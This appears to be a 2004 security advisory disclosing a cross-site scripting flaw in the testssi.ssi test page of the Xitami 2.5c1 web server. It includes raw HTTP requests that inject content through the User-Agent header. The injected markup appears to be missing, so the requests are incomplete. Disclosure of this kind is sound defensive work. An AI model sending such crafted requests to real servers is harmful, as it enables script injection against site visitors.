Xitami Imatix testssi.ssi User-Agent XSS
========================================
Xitami is an easy to use and open source webserver, running on several platforms.
What?
=====
Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which delivers
a website with the content of several SSI-variables.
Within the variables "HTTP_USER_AGENT" and "HTTP_REFERER", no (sufficient) content
checking is done. The content of this variables is delivered by the webbrowser, and
therefore can be manipulated by the user.
How?
====
Telnet (dont netcat!) to port 80:
GET /testssi.ssi HTTP/1.1
Host: localhost
User-Agent: PLEASE CLICK HERE
Connection: close
GET /testssi.ssi HTTP/1.1
Host:
User-Agent: PLEASE CLICK HERE
Connection: close
Misc:
=====
This_paper: www.oliverkarow.de/research/xitami25c1_testssi_XSS.txt
Screenshot: www.oliverkarow.de/research/xitami25c1_1.GIF
Screenshot: www.oliverkarow.de/research/xitami25c1_2.GIF
Vendor: www.imatix.com
Date: 22.07.2004